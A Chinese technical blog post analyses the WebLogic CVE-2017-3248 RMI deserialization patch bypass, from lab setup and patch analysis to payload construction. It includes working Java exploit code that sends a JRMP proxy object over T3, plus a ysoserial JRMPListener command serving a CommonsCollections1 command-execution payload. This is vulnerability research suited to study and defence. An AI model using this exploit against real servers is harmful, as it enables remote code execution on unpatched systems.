<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    【技術分享】RMI初探—Weblogic CVE-2017-3248反序列化漏洞

    VSole2021-09-23 18:00:00

    0×1漏洞背景

    該漏洞是繼CVE-2015-4852、CVE-2016-0638、CVE-2016-3510之后的又一個重量級反序列化漏洞。該漏洞使用了在當時為新型技術的rmi反序列化漏洞繞過了之前的修補補丁 。適用版本包括了10.3.6.0、12.1.3.0、12.2.1.0以及12.2.1.1等多個版本。筆者將從環境搭建、漏洞補丁分析、繞過方法思考、payload構建等多個方面進行研究,盡可能的將一些坑點和知識點摸排清楚,從0到1學習weblogic反序列化。

    0×2環境搭建及補丁安裝

    0x1 環境搭建

    1.1 現成環境

    可以采用現成的docker環境,執行以下命令生成對應版本的docker

    docker run -d -p 7001:7001 -p 8453:8453 turkeys/weblogic:10.3.6

    1.2 自動搭建

    利用Docker自動化搭建,在github下載搭建代碼

    [https://github.com/BabyTeam1024/WeblogicAutoBuild.git](https://github.com/BabyTeam1024/WeblogicAutoBuild.git)

    本次實驗環境采用jdk7u21和weblogic 10.3.6.0,在jdk_use和weblogic_use文件夾下存放相對應版本的程序

    執行如下命令:

    ./WeblogicDockerBuild.shdocker-compose up -d
    

    詳情可參考https://www.yuque.com/docs/share/c95cbc62-d853-4de3-94ff-282b2de3b456

    0x2 補丁安裝

    本次使用的補丁是 p23094342_1036_Generic.zip(需要補丁的同學可以聯系筆者獲取)

    獲取到補丁后用如下指令進行安裝

    cd /weblogic/oracle/middleware/utils/bsu./bsu.sh -install -patch_download_dir=/weblogic/oracle/middleware/utils/bsu/cache_dir/ -patchlist=UIAL -prod_dir=/weblogic/oracle/middleware/wlserver
    補丁信息如下
    

    0×3補丁分析及繞過

    0x1 補丁分析

    第一時間拿到補丁后,使用之前的CVE-2016-3510 payload打了下沒有反應,并且從log中發現如下報錯

    從報錯中清楚的了解到MarshalledObject是不可被反序列化的。反過頭來看下補丁是如何修補的。頭腦簡單的筆者一開始認為這次又是添加了什么白名單,就在各種blacklist中瘋狂尋找,無果,郁悶了半天。突然在使用idea分析時在補丁包中發現了一個MarshalledObject.class文件,如下所示

    筆者為了證明是這個相同包路徑的接口影響了MarshalledObject反序列化,做了以下操作

    mkdir testcp BUG23094342_10360160719.jar test/tar xvf BUG23094342_10360160719.jarrm BUG23094342_10360160719.jar rm weblogic/corba/utils/MarshalledObject.classtar -cvf BUG23094342_10360160719.jar ./
    

    然后再使用CVE-2016-3510 payload試了下,發現可以成功

    那么總結下這次補丁是編寫相同包名和類名的接口覆蓋之前的類,使其變得不可反序列化,妙啊!

    0x2 前置知識-RMI反序列化

    理論上講找個類替代MarshalledObject的功能即可完成繞過,但這次并沒有這么做,而是引出了一種比較有意思的反序列化漏洞,RMI反序列化漏洞(關于這個系列的漏洞,筆者打算單獨開個板塊進行分析)。這次主要介紹如何繞過該補丁。

    RMI 為Java遠程方法調用,是Java編程語言里,一種用于實現遠程過程調用的應用程序編程接口。它使客戶機上運行的程序可以調用遠程服務器上的對象。RMI反序列整個體系比較復雜,但一般掌握了其中幾個知識點就可以應對很多場景了。筆者在整理RMI知識的時候,總結了RMI通信過程中可利用的反序列化點

    大致分為三類

    客戶端觸發,服務端觸發和注冊中心觸發,ysoserial中涉及的幾個反序列化點都在對應的地方標注了。

    客戶端觸發

    1.當客戶端向注冊中心發送lookup數據包時注冊中心會把stub對象返回給客戶端并在客戶端觸發readObject

    2.當客戶端使用StreamRemoteCall與遠程通信時,在executeCall函數中存在反序列化在客戶端觸發readObject(payloads/JRMPClient配合exploit/JRMPListener)

    3.當客戶端使用DGCImpl_Stub與DGC服務端交互式時會在dirty函數中反序列化遠程傳遞過來的Lease對象序列化后的數據,在客戶端觸發readObject

    服務端觸發

    1.當客戶端向服務端發送調用遠程方法的請求時會先使用DGCImpl_Stub和服務端通信,在處理dirty請求時會在對象申請和引用的時候在服務端觸發readObject(exploit/JRMPClient,可配合payloads/JRMPListener)

    注冊中心觸發

    1.當客戶端向注冊中心發送lookup數據包時會把binding中stub對應的String類型名字以序列化的形式發送,注冊中心收到數據包后,將會在注冊端觸發readObject,反序列化傳過來的名字。

    2.當服務端或客戶端向注冊中心(RegistryImpl)bind綁定stub的時候會在注冊端觸發readObject(exploit/RMIRegistryExploit)

    3.當服務端或客戶端向注冊中心(RegistryImpl)unbind解綁stub的時候會在注冊端觸發readObject

    4.當服務端或客戶端向注冊中心(RegistryImpl)rebind重新綁定stub的時候會在注冊端觸發readObject

    0x3 RMI反序列化原理

    CVE-2017-3248 可采用客戶端或是服務端觸發兩種方式繞過上次漏洞補丁。重點分析payloads/JRMPClient配合exploit/JRMPListener完成此次攻擊利用的深層次原理。

    payloads/JRMPClient的反序列化背景是客戶端獲取到來自RegistryImpl_Skel的回應后,將會調用DGCClient的與遠程DGCServer進行通信。調用棧如下

    主要問題出現在StreamRemoteCall.class類的executeCall函數上

    觀察發現this.in為ConnectionInputStream類型并沒有黑名單的限制,因此只要服務端可控,就可以像客戶端發送任意反序列化數據。

    碰巧的是在RemoteObjectInvocationHandler的反序列化代碼里會調用這個StreamRemoteCall類里的executeCall方法

    結合之前的調用棧dgc.dirty函數就已經可以觸發到executeCall代碼

    0×4利用方法

    0x1 如何構造Payload

    前面分析了漏洞原理,那么客戶端需要構建怎樣的代碼才能觸發到反序列化呢?這個還要從rmi機制說起,詳細內容可以將會在之后的rmi專題進行講解,這里只是把大概邏輯捋一捋,這一節會有很多類和變量,不理解沒關系主要了解過程。

    首先思考一個問題,RMI客戶端如何調用遠程服務器上的其他類?RMI機制是這么做的,涉及到對端調用的類將會生成類似Stub和Skel的對等結構,其中Stub在客戶端保存(客戶端可自己生成比如RegistryImpl_stub,也可通過網絡通過網絡從服務端獲取Proxy(MyclassImpl))。因為我們只分析客戶端,這里引出一張客戶端RMI調用流程圖

    • 黃線:客戶端首先調用getRegistry函數生成注冊中心Stub(RegistryImpl_stub)
    • 黃線:接著通過lookup方法與遠程服務通信,遠程服務會在ObjectTable中匹配該stub包含的Target,進行路由分發
    • 紫線:服務端接收到lookup請求后,會將已經生成好的代理類Proxy(MyclassImpl)返回給客戶端
    • 綠線:客戶端收到代理類Stub,直接調用其中的方法就會與遠程服務通信并在遠程執行相關代碼

    我們重點關注下紫線部分的處理流程,服務端到底返回的是個什么東西,我們找到服務端啟動代碼

    當代碼執行到13行時,因為UserImpl繼承了UnicastRemoteObject類并且在構造方法里調用了父類構造方法,所以將會執行UnicastRemoteObject類中的構造方法

    構造方法會調用exportObject

    下面重點來了,如何封裝傳遞給Client端的Stub

    方便理解筆者倒著分析,在最后利用RemoteObjectInvocationHandler代理了我們需要執行的類,那么RemoteRef是如何而來的,從當前代碼中只能看見時getClientRef獲取到的

    getClientRef代碼如下,this.ref是什么時候賦值的?

    在UnicastRemoteObject構造方法一開始時就賦值了,sref如何生成

    sref其實是UnicastServerRef是UnicastRef的子類

    在其構造方法中創建了LiveRef對象并賦值給了UnicastRef的ref變量

    可能會有些繞,整體可以總結為如下代碼

    ObjID id = new ObjID(new Random().nextInt()); TCPEndpoint te = new TCPEndpoint("192.168.0.213", 7777);UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
    

    仿照服務端的createProxy函數,將RemoteObjectInvocationHandler封裝進代理類。

    (Registry)Proxy.newProxyInstance(cve_2017_3248.class.getClassLoader(), new Class[]{Registry.class}, obj)
    

    利用代碼如下所示,完整項目代碼在https://github.com/BabyTeam1024/CVE-2017-3248

    package main;
    import com.supeream.serial.Serializables;import com.supeream.weblogic.T3ProtocolOperation;import sun.rmi.server.UnicastRef;import sun.rmi.transport.LiveRef;import sun.rmi.transport.tcp.TCPEndpoint;import java.lang.reflect.Proxy;import java.rmi.registry.Registry;import java.rmi.server.ObjID;import java.rmi.server.RemoteObjectInvocationHandler;import java.util.Random;
    public class cve_2017_3248 {    public Object getObject(){        ObjID id = new ObjID(new Random().nextInt()); // RMI registry        TCPEndpoint te = new TCPEndpoint("192.168.0.213", 7777);        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);        Registry proxy = (Registry)Proxy.newProxyInstance(cve_2017_3248.class.getClassLoader(), new Class[]{Registry.class}, obj);        return proxy;    }    public static void main(String[] args) throws Exception {        Object obj = new cve_2017_3248().getObject();        byte[] payload2 = Serializables.serialize(obj);        T3ProtocolOperation.send("127.0.0.1", "7001", payload2);    }}
    

    0x2 整合利用

    整個過程使用JRMP Server端反打Client端

    Step 1 使用JRMPListener監聽端口

    java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar  ysoserial.exploit.JRMPListener 7777 CommonsCollections1 'touch /tmp/D4ck'
    

    Step 2 發送漏洞payload

    反序列化數據中包含rmi 客戶端鏈接代碼
    

    0×5總結

    CVE-2017-3248 使用了RMI反序列化漏洞,也揭開了筆者分析RMI漏洞原理的新篇章。后面將不斷分析Weblogic相關反序列化漏洞,以及系統總結整理RMI反序列化漏洞的基礎知識和簡單利用。

    序列化rmi
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    RMI存在著三個主體RMI RegistryRMI ClientRMI Server
    該漏洞是繼CVE-2015-4852、CVE-2016-0638、CVE-2016-3510之后的又一個重量級反序列化漏洞。
    序列化漏洞匯總
    2022-01-07 22:17:34
    漏洞出現在WLS Security組件,允許遠程攻擊者執行任意命令。攻擊者通過向TCP端口7001發送T3協議流量,其中包含精心構造的序列化Java對象利用此漏洞。然后將其序列化,提交給未做安全檢測的Java應用。Java應用在進行反序列化操作時,則會觸發TransformedMap的變換函數,執行預設的命令。
    一次完整的滲透測試
    2021-11-19 15:35:41
    滲透測試中,Web端最常見的問題大多出現在弱口令、文件上傳、未授權、任意文件讀取、反序列化、模版漏洞等方面。因此,我們著重圍繞這些方面進行滲透。
    常見端口滲透總結
    2022-01-16 22:32:17
    這樣,客戶端就能命令FTP服務器發一個文件給被攻擊的服務。基于Linux系統,配置方面很簡單。在nfs配置中,有不做任何限制的,有限制用戶,有限制IP,以及在版本2.x中我們還可以使用證書來驗證用戶。當然不同的限制可以采用的攻擊方式也不一樣;就目前而言網上關于nfs的攻擊還是比較少的!但是畢竟主流的攻擊方式仍舊是那些,比如注入,未授權等等;這些問題的出現也都是因為配置不當而造成的。
    Apache OFBiz是一個電子商務平臺,用于構建大中型企業級、跨平臺、跨數據庫、跨應用服務器的多層、分布式電子商務類應用系統。2021年3月22日 Apache OFBiz官方發布安全更新,修復了一處由RMI序列化造成的遠程代碼執行漏洞(CVE-2021-26295)。攻擊者可構造惡意請求,觸發反序列化,從而造成任意代碼執行,控制服務器。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类